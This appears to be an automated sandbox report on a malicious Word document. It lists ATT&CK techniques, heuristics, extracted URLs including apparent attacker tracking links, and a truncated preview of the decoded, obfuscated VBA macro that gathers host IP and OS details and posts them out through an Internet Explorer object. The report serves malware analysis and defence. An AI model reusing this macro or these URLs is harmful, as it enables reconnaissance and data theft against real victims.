Verdict: MALICIOUS
Risk Score: 150

Malware Insights

MITRE ATT&CK:
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
- T1140 Deobfuscate/Decode Files or Information
- T1204.002 Malicious File
The OOXML document contains VBA macros, indicated by the 'OOXML_VBA' heuristic. The script uses 'CreateObject' and 'GetObject' calls, suggesting it attempts to interact with the system or download external content. The presence of a remote image URL in the document's relationships and the VBA code's structure point towards a macro-based downloader. The document body presents a fake form, urging the user to 'Enable Content', a common social engineering tactic.
Heuristics (7)

| ID | Heuristic | Severity | Details |
|---|---|---|---|
| OOXML_VBA | VBA project inside OOXML | medium | Document contains a VBA project — VBA macros present (3 related findings) |
| OLE_VBA_CREATEOBJ | CreateObject call | high | CreateObject call |
| OLE_VBA_GETOBJ | GetObject call | high | GetObject call |
| OLE_VBA_ENVIRON | Environ() call (env variable access) | low | Environ() call (env variable access) |
| OOXML_IMAGE_BEACON | Remote image (web beacon / tracking pixel) | medium | Document references an external image URL — loads automatically on open, revealing IP address and timestamp to the server (used for phishing tracking and NTLM hash theft on corporate networks) |
| OOXML_EXTERNAL_REL | External relationship | medium | External target in word/_rels/document.xml.rels: https://24ikamf3ld3rlmmg6h6xdn6av3m3n2dc.sso.ingos.su/static/image.png?user_rid=b2wqtxw25dq6qkuvuh75hoj5csumouwi |
| EMBEDDED_URL | Embedded URL | info | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels below for which channel (macro, JS, link annotation, document body, ...) reached each URL. |

Extracted URLs (per-URL channel label in parentheses):
- https://24ikamf3ld3rlmmg6h6xdn6av3m3n2dc.sso.ingos.su/static/image.png?user_rid=b2wqtxw25dq6qkuvuh75hoj5csumouwi (OOXML external relationship)
- https://post.ingos.su/035acff221d8cb7d882cc8e8a64169f482adb3cdfa6b7912 (in document text: OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (in document text: OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/math (in document text: OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (in document text: OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (in document text: OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/main (in document text: OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordml (in document text: OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordml (in document text: OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (in document text: OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInk (in document text: OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordml (in document text: OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShape (in document text: OOXML body / shared strings)
- http://schemas.openxmlformats.org/package/2006/relationships (in document text: OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties (in document text: OOXML body / shared strings)
- http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties (in document text: OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument (in document text: OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationships/custom-properties (in document text: OOXML body / shared strings)
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 5190 bytes | 22f0950305fe309caf37145b0a0bcfda075234a6cbe6bfab1d795b959c0e012d |

Preview script (macros.bas): first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 0, 1, MSForms, CommandButton"
Private Sub CommandButton1_Click()
MsgBox ("Произошла ошибка.")
Module1.phxUC
End Sub
Attribute VB_Name = "Module1"
Function MoRwAl(Length As Integer)
Dim cyZfAYwgIIfFvIsATgJwiTdY As Variant
Dim JPdNU As Long
Dim fOTTnnWjFVt As String
cyZfAYwgIIfFvIsATgJwiTdY = Array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", _
"k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", _
"y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", _
"A", "B", "C", "D", "E", "F", "G", "H", _
"I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", _
"W", "X", "Y", "Z")
For JPdNU = 1 To Length
Randomize
fOTTnnWjFVt = fOTTnnWjFVt & cyZfAYwgIIfFvIsATgJwiTdY(Int((UBound(cyZfAYwgIIfFvIsATgJwiTdY) - LBound(cyZfAYwgIIfFvIsATgJwiTdY) + 1) * Rnd + LBound(cyZfAYwgIIfFvIsATgJwiTdY)))
Next JPdNU
MoRwAl = fOTTnnWjFVt
End Function
Function tDZSy() As String
Dim lkbYi As String
Dim nyUIrqdl As Object
Dim tHpbaCSZwbtwawWuUBFoJryI As Object
Dim HKajOgmuWKoQWMJvgfQJC As Object
Dim twWEGMifiAjaJPBvyTSc As String
Dim ZYMGcZyIK As Integer
lkbYi = "."
twWEGMifiAjaJPBvyTSc = ""
Set nyUIrqdl = GetObject("winmgmts:\\" & lkbYi & "\root\cimv2")
Set tHpbaCSZwbtwawWuUBFoJryI = nyUIrqdl.ExecQuery _
("Select * from Win32_NetworkAdapterConfiguration where IPEnabled=TRUE")
For Each HKajOgmuWKoQWMJvgfQJC In tHpbaCSZwbtwawWuUBFoJryI
If Not IsNull(HKajOgmuWKoQWMJvgfQJC.IPAddress) Then
For ZYMGcZyIK = LBound(HKajOgmuWKoQWMJvgfQJC.IPAddress) To UBound(HKajOgmuWKoQWMJvgfQJC.IPAddress)
twWEGMifiAjaJPBvyTSc = twWEGMifiAjaJPBvyTSc & HKajOgmuWKoQWMJvgfQJC.IPAddress(ZYMGcZyIK) & " " & HKajOgmuWKoQWMJvgfQJC.Description(ZYMGcZyIK) & vbCrLf
Next
End If
Next
tDZSy = twWEGMifiAjaJPBvyTSc
End Function
Function CWiZQLNpdAQY() As String
Dim zxTFxoDfJgbnQyQpJIEtUfd As String
Dim PQXxhwIJVZcCOcNKyMRrwmpO As Object
Dim uBtVUmuNzC As Object
Dim VAklWhN As Object
Dim GXMsv As String
zxTFxoDfJgbnQyQpJIEtUfd = "."
GXMsv = ""
Set PQXxhwIJVZcCOcNKyMRrwmpO = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & zxTFxoDfJgbnQyQpJIEtUfd & "\root\cimv2")
Set uBtVUmuNzC = PQXxhwIJVZcCOcNKyMRrwmpO.ExecQuery("Select * from Win32_OperatingSystem")
For Each VAklWhN In uBtVUmuNzC
GXMsv = GXMsv & VAklWhN.Caption & " " & VAklWhN.Version & vbCrLf
Next
CWiZQLNpdAQY = GXMsv
End Function
Sub DQDAaDiPKwRESWiCI(JfoSKuANf As String, olGjMVgRkXODBJPZQhwv As String, gAvRlZFgn As String)
Dim WebBrowser: Set WebBrowser = CreateObject("InternetExplorer.Application")
Dim XZHaouZuPbyfqRWWaZNM() As Byte
ReDim XZHaouZuPbyfqRWWaZNM(Len(olGjMVgRkXODBJPZQhwv) - 1)
XZHaouZuPbyfqRWWaZNM = StrConv(olGjMVgRkXODBJPZQhwv, vbFromUnicode)
WebBrowser.Navigate JfoSKuANf, 2 + 4 + 8, , XZHaouZuPbyfqRWWaZNM, _
"Content-type: multipart/form-data; boundary=" + gAvRlZFgn + Chr(10) + Chr(13)
Do While WebBrowser.busy
DoEvents
Loop
WebBrowser.Quit
End Sub
Function pCnvrdistEp(vpaITyBBcRHDlWGGLNHTKinF As String, CtPjMmpKcDPobsHCyjvI As String, EgkQuHSMoxSYAml As String, nmfOQmboODoOModusSqV As String, bPppYAdTwBJWNywIegr As String, sthptmT As String, Optional ByVal bAsync As Boolean) As String
Dim uUNyb As String
uUNyb = "--" & vpaITyBBcRHDlWGGLNHTKinF & vbCrLf & _
"Content-Disposition: form-data; name=" & bPppYAdTwBJWNywIegr & "" & vbCrLf & vbCrLf & _
sthptmT & vbCrLf & _
"--" & vpaITyBBcRHDlWGGLNHTKinF & vbCrLf & _
"Content-Disposition: form-data; name=" & CtPjMmpKcDPobsHCyjvI & "" & vbCrLf & vbCrLf & _
nmfOQmboODoOModusSqV & vbCrLf & _
"--" & vpaITyBBcRHDlWGGLNHTKinF & "--"
DQDAaDiPKwRESWiCI EgkQuHSMoxSYAml, uUNyb, vpaITyBBcRHDlWGGLNHTKinF
End Function
Function NmXAAKfdkIGGRFhOW(os As String) As String
Dim yMKTmQMviBN As String
yMKTmQMviBN = Chr(10) & "User:" & E
... (truncated)
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 36352 bytes | 8c15345d566f56a544778923f925fca3217c187942de6cae1902b7e642822125 |